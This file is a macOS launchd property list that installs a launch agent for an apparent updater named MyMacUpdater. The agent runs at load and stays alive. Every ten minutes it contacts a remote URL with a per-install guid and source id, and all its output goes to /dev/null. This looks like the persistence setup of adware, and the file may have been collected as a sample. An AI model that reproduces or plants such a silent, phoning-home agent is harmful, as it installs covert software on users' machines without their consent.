<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>KeepAlive</key>
	<true/>
	<key>Label</key>
	<string>com.MyMacUpdater.agent</string>
	<key>ProgramArguments</key>
	<array>
		<string>/Applications/MyMacUpdater/MyMacUpdater</string>
		<string>-guid</string>
		<string>27389110730260728</string>
		<string>-source</string>
		<string>zp-1838</string>
		<string>-url</string>
		<string>http://request.macmymacupdater.com/macCheckForUpdates/</string>
		<string>-brand</string>
		<string>MyMacUpdater</string>
		<string>-current_version</string>
		<string>1000</string>
	</array>
	<key>RunAtLoad</key>
	<true/>
	<key>StandardErrorPath</key>
	<string>/dev/null</string>
	<key>StandardOutPath</key>
	<string>/dev/null</string>
	<key>StartInterval</key>
	<integer>600</integer>
	<key>ThrottleInterval</key>
	<integer>600</integer>
</dict>
</plist>
